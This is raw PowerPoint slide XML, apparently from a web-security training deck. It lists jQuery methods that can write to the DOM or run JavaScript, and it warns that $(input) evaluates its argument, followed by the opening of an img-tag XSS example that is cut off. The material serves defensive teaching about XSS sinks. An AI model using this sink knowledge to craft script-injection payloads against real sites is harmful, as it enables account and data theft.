                      <a:endParaRPr lang="en-US" sz="1400">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="1828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8739">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n-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>HTML</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="1828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n-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>URL (Potential redirect)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="1828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457200" y="5884654"/>
            <a:ext cx="8229600" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tech.blog.box.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/2013/08/securing-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-against-unintended-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3156985043"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="2460683"/>
          <a:ext cx="8229600" cy="2301173"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1830853">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6398747">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="32873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solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>jQuery</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> methods</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> that directly update DOM or can execute JavaScript</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="1828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B3D16"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="328739">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>$()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t> or </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>jQuery</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Tahoma"/>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rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>attr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>()</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8739">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>.add()</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rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>css</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>()</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28739">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>.after()</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rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>.html()</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28739">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>.animate()</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algn="l" rtl="0" eaLnBrk="1" fontAlgn="t" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>insertAfter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a: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28739">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>.append()</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algn="l" rtl="0" eaLnBrk="1" fontAlgn="t" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>.insertBefore()</a:t>
                      </a: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8739">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>appendTo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>()</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rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Note: .text() updates</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t> DOM, but is safe.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Tahoma"/>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3037012938"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="4750073"/>
          <a:ext cx="8229600" cy="986217"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1830853">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6398747">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="32873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solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>jQuery</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> methods</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> that directly update DOM or can execute JavaScript</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="1828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B3D16"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="328739">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>$()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t> or </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>jQuery</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Tahoma"/>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rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>attr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>()</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28739">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>.add()</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l" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>css</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRP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7276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jQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: But there is more…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1526946"/>
            <a:ext cx="2630029" cy="1815880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DB3D16"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="274320" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:no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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>More Danger</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3185759" y="1526944"/>
            <a:ext cx="5958242" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="457200" bIns="91440">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2024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(danger) or $(danger)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- This immediately evaluates the input!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- E.g., $("&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
